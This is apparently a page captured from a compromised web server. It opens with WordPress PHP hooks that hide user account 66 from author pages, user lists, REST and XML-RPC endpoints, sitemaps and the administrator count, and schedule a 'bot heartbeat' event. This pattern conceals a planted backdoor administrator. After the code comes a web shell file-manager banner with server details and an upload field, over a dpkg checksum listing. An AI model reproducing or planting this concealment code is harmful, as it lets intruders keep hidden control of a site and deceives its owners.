add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/lib/dpkg/info/ |
Upload File : |
91d3629453271528f8b14d386953f526 usr/bin/validate-json 887b57b647692acb85966cf08f0c8bde usr/share/doc/php-json-schema/README.md.gz ab8ff3f60918ddc2e654644290ac4a7c usr/share/doc/php-json-schema/changelog.Debian.gz 7d2b4fe9446f60a97f045a6bd6097a4d usr/share/doc/php-json-schema/copyright 7fce80320ec673f1e68fc4219b8bae40 usr/share/doc/php-json-schema/examples/README.md c92ef80da20b66a158443a30d7c40f93 usr/share/doc/php-json-schema/examples/data.json e1c7a3643dcd1c30f6da4f3145151c6b usr/share/doc/php-json-schema/examples/demo.php 69581c3cd5194a134b14ace47d476aa0 usr/share/doc/php-json-schema/examples/schema.json 27b587c8ccb4d7331b3914d88f2cf990 usr/share/doc/php-json-schema/schema/json-schema-draft-03.json 523031cad1f5c2c2163b0e8298278c73 usr/share/doc/php-json-schema/schema/json-schema-draft-04.json.gz 80b8dbc5b820101a2322c0faaa953000 usr/share/man/man1/validate-json.1.gz 0ab5cd6a1f4a2796097f48ad21351de9 usr/share/php/JsonSchema/Constraints/BaseConstraint.php e41c3e42cb06f24bd4e7bcba82c7be6e usr/share/php/JsonSchema/Constraints/CollectionConstraint.php 855ef1d5353f09fb751821705582067d usr/share/php/JsonSchema/Constraints/Constraint.php a7b9d394ad674a9b0282896c6196b58c usr/share/php/JsonSchema/Constraints/ConstraintInterface.php 2852c85cadbac8f643f91573bdf09f12 usr/share/php/JsonSchema/Constraints/EnumConstraint.php 2f524b07bee9e770719f1ccc12054bb8 usr/share/php/JsonSchema/Constraints/Factory.php b6af2b5e9c33516fb886ee79316a9058 usr/share/php/JsonSchema/Constraints/FormatConstraint.php e3572841c6e3301623112c3a71f3563d usr/share/php/JsonSchema/Constraints/NumberConstraint.php 9315814ce9e7f565483fa4baa41d9236 usr/share/php/JsonSchema/Constraints/ObjectConstraint.php 1bccac6073c77852b17f65bd1ebea5e7 usr/share/php/JsonSchema/Constraints/SchemaConstraint.php eb6a3b03774ba79f99992ce2fddb8c81 usr/share/php/JsonSchema/Constraints/StringConstraint.php e6a59dfc2b652917cbaae64cb7e127a4 usr/share/php/JsonSchema/Constraints/TypeCheck/LooseTypeCheck.php 8fbec3739e9ac65f85214505e2aaeb00 usr/share/php/JsonSchema/Constraints/TypeCheck/StrictTypeCheck.php 1c200bcf300eefbe640d566128fba35d usr/share/php/JsonSchema/Constraints/TypeCheck/TypeCheckInterface.php b86560a3f4ec8ddbe7b05a97652e4752 usr/share/php/JsonSchema/Constraints/TypeConstraint.php 569c79deda18b90cb0d97b689f4db881 usr/share/php/JsonSchema/Constraints/UndefinedConstraint.php 35959f26262e02339c27ab8ca24941a7 usr/share/php/JsonSchema/Entity/JsonPointer.php bfe5dace355991f4205e9dd21de42646 usr/share/php/JsonSchema/Exception/ExceptionInterface.php eec6f60dedab7adea701a8f583218206 usr/share/php/JsonSchema/Exception/InvalidArgumentException.php f64c88af922eb63351d87160a161c45e usr/share/php/JsonSchema/Exception/InvalidConfigException.php e40082f1aa894c8dac4a0b8e479cd674 usr/share/php/JsonSchema/Exception/InvalidSchemaException.php 2d55ff83d020a05b9bb30291e82bacf2 usr/share/php/JsonSchema/Exception/InvalidSchemaMediaTypeException.php 20d74cca586aa7663c45b8d6cd1154e4 usr/share/php/JsonSchema/Exception/InvalidSourceUriException.php 9a837dfdd0d96251a3b20acd2c76aaa8 usr/share/php/JsonSchema/Exception/JsonDecodingException.php c57e0964e13121af5fb6b3b3f0c0da6a usr/share/php/JsonSchema/Exception/ResourceNotFoundException.php 34ef85ee485879602d82604a40ea7030 usr/share/php/JsonSchema/Exception/RuntimeException.php 5e9a53de29ab0389ff254fbca7247f51 usr/share/php/JsonSchema/Exception/UnresolvableJsonPointerException.php 636be0e6395d62db8345865245a5b275 usr/share/php/JsonSchema/Exception/UriResolverException.php 0d98b5ff20a405accc809c4bf81aa2a1 usr/share/php/JsonSchema/Exception/ValidationException.php a1f973b8f1c0a052a87a7249fa9ec4b7 usr/share/php/JsonSchema/Iterator/ObjectIterator.php e460e42e5b1e081f2d9a76f8abe18a12 usr/share/php/JsonSchema/Rfc3339.php da0e936241e4492a4ad4ad9a7732edb7 usr/share/php/JsonSchema/SchemaStorage.php 2c7d1214be1e09c778ed2d52792dab1d usr/share/php/JsonSchema/SchemaStorageInterface.php 7f7c256c965f0015d99850d3d0060453 usr/share/php/JsonSchema/Uri/Retrievers/AbstractRetriever.php c6e9a0ca414aadf773223d2d63764478 usr/share/php/JsonSchema/Uri/Retrievers/Curl.php 8b4e5c3e77707d7b5dfaff0afe2c4e7e usr/share/php/JsonSchema/Uri/Retrievers/FileGetContents.php 25b815d10dd360bc16ecc2b2d9a53bc6 usr/share/php/JsonSchema/Uri/Retrievers/PredefinedArray.php 9df2c249b5c238957102ccf511a28255 usr/share/php/JsonSchema/Uri/Retrievers/UriRetrieverInterface.php 0facd1e043a3b2982d8e40e7ee053986 usr/share/php/JsonSchema/Uri/UriResolver.php fa92785b015cc59b0c93dd58c9626c6a usr/share/php/JsonSchema/Uri/UriRetriever.php 32498eeea7040f89fa8dc0ef39dd327d usr/share/php/JsonSchema/UriResolverInterface.php 091daa78a9c5ef6ba7e0f24aa73e1a97 usr/share/php/JsonSchema/UriRetrieverInterface.php ba77f09b514812fe1a4cea00dee37c61 usr/share/php/JsonSchema/Validator.php 0b81453ded313cd76ab12fbdaf672d43 usr/share/php/JsonSchema/autoload.php 27b587c8ccb4d7331b3914d88f2cf990 usr/share/php/data/JsonSchema/dist/schema/json-schema-draft-03.json 6857f5dc452405f8e457e98833b4cd7d usr/share/php/data/JsonSchema/dist/schema/json-schema-draft-04.json f67e160c9147ec6f636d02985264496e usr/share/pkg-php-tools/autoloaders/php-json-schema cef89e95184b45e616427600cec38de7 usr/share/pkg-php-tools/overrides/php-json-schema